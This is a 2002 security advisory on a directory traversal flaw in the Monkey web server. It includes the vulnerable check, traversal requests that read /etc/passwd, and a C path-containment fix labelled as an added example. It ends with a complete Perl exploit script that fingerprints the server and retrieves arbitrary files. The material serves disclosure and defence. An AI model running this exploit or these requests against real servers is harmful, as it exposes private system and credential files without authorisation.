[UNIX] Directory Traversal Vulnerability in Monkey
From: support@securiteam.com Date: 09/30/02
From: support@securiteam.com To: list@securiteam.com Date: Mon, 30 Sep 2002 16:29:58 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Directory Traversal Vulnerability in Monkey
------------------------------------------------------------------------
SUMMARY
<http://monkeyd.sourceforge.net> Monkey is a web server written in C that
runs under Linux. It is an open source project based on the HTTP/1.1
protocol. A security vulnerability in the product allows remote attackers
to perform directory traversal, giving them access to files that would
otherwise be inaccessible (files residing outside the HTML root directory
that normally bounds requests).
DETAILS
Vulnerable systems:
* Monkey version 0.1.4
Immune systems:
* Monkey version 0.5.0
Monkey does not check the HTTP request for the "../" string; because of
that, an attacker can view any file outside the SERVER_ROOT directory that
Monkey can read (if Monkey is running under the root account, the attacker
can read any file on that machine).
Vulnerable code:
- src/method.c
..
    /* only the second character of the request is inspected: "/../" is
       caught, but "//../" (second character '/') is not */
    if((strcmp(aux_request,"/"))==0 || aux_request[1]=='.' ) {
        snprintf(filename,255,"%s",SERVER_ROOT);
    }
As written in the above code, the following will be blocked:
---cut here---
GET /../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
However, this will not:
---cut here---
GET //../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
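A containment check that handles both request forms above, added here as an example and not taken from Monkey's source; the function name and the document root "/var/www" used in the comments are assumptions. Every "/"-separated segment is resolved lexically, so a leading "//" collapses instead of defeating the check:

```c
#include <string.h>

/* Added example, not Monkey's code. Lexically resolves a request path
 * against a document root. Runs of '/' are collapsed, "." is dropped,
 * ".." pops the previous segment, and a ".." with nothing left to pop
 * means the request tried to leave the root -> rejected (returns 0).
 * On success, writes root + normalised path into out and returns 1.
 * Root values such as "/var/www" are constructed for illustration. */
int resolve_under_root(const char *root, const char *request,
                       char *out, size_t outlen)
{
    const char *segs[64];  /* start of each kept segment */
    size_t lens[64];       /* length of each kept segment */
    int depth = 0;
    const char *p = request;

    while (*p) {
        while (*p == '/') p++;            /* "//../" and "/../" look alike */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - start);
        if (len == 1 && start[0] == '.') continue;      /* "." : no-op */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0) return 0;     /* would escape the root */
            depth--;
            continue;
        }
        if (depth == 64) return 0;        /* deeper than this buffer allows */
        segs[depth] = start;
        lens[depth] = len;
        depth++;
    }

    /* Rebuild: root, then "/segment" for each kept segment. */
    size_t used = strlen(root);
    if (used >= outlen) return 0;
    memcpy(out, root, used);
    for (int i = 0; i < depth; i++) {
        if (used + 1 + lens[i] >= outlen) return 0;   /* no room in out */
        out[used++] = '/';
        memcpy(out + used, segs[i], lens[i]);
        used += lens[i];
    }
    out[used] = '\0';
    return 1;
}
```

The check is purely lexical: percent-encoded dots must be decoded and any query string stripped before the path is passed in, and a symlink inside the root can still point outside it, so a final realpath() comparison against the root is still worthwhile.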
Vendor response:
This bug was reported in December 2001 and corrected in the following
versions. Anyway, Monkey 0.5.0 was released recently.
Exploit:
#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit
#
# Usage:
#   perl monkey.pl <hostname> <httpport> <file>
#
#   <hostname> - target host
#   <httpport> - port on which HTTP daemon is listening
#   <file>     - file which you wanna get
#
# Example:
#   perl monkey.pl www.ii-labs.org 80 /etc/passwd
#
# by DownBload <downbload@hotmail.com>
# Illegal Instruction Labs
#
use IO::Socket;

sub sock () {
    $SOCK = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => $port,
                                  Proto    => "tcp")
        || die "[ ERROR: Can't connect to $host!!! ]\n\n";
}

sub banner() {
    print "[--------------------------------------------------]\n";
    print "[ Monkey-0.1.4 reverse traversal exploit ]\n";
    print "[ by DownBload <downbload\@hotmail.com> ]\n";
    print "[ Illegal Instruction Labs ]\n";
    print "[--------------------------------------------------]\n";
}

if ($#ARGV != 2) {
    banner();
    print "[ Usage: ]\n";
    print "[ perl monkey.pl <hostname> <httpport> <file> ]\n";
    print "[--------------------------------------------------]\n";
    exit(0);
}

$host = $ARGV[0];
$port = $ARGV[1];
$file = $ARGV[2];

banner();
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending probe... ]\n";
print $SOCK "HEAD / HTTP/1.0\n\n";
while ($a = <$SOCK>) { $line = $line . $a; }
if ($line =~ /Monkey/) { print "[ Monkey HTTP server found, continuing... ]\n"; }
else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
close($SOCK);

print "[ Connecting to $host... ]\n";
sock();
print "[ Sending GET request... ]\n";
print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n";
print "[ Waiting for response... ]\n\n";
while ($line = <$SOCK>) { print $line; }
close($SOCK);
ADDITIONAL INFORMATION
The information has been provided by <mailto:edsiper@linux-chile.org>
edsiper and <mailto:keziah@uole.com> Daniel R. Ome.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.